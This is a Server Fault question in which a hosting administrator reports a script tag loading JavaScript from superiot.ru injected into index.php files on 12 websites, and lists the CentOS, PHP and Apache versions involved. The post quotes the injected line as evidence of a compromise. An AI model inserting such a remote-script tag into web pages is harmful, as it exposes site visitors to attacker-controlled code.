Information about recent code injection from http://superiot.ru
Posted
by
klennepette
on Server Fault
See other posts from Server Fault
or by klennepette
Published on 2010-10-01T08:28:50Z
Indexed on
2010/12/26
2:55 UTC
Read the original article
Hit count: 338
php
|server-security
Hello,
I manage the hosting for a few dozen websites. Since about a week I've been finding this code in 12 different websites in theindex.php
files:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
Some of the websites are on different servers, some aren't. I'm just wondering if anyone else has been seeing this too.
Edit with some more information:
- All servers are centOS 5.3
- PHP versions are either 5.2.9 or 5.2.4
- Apache versions are either 2.2.3 or 1.3.39
© Server Fault or respective owner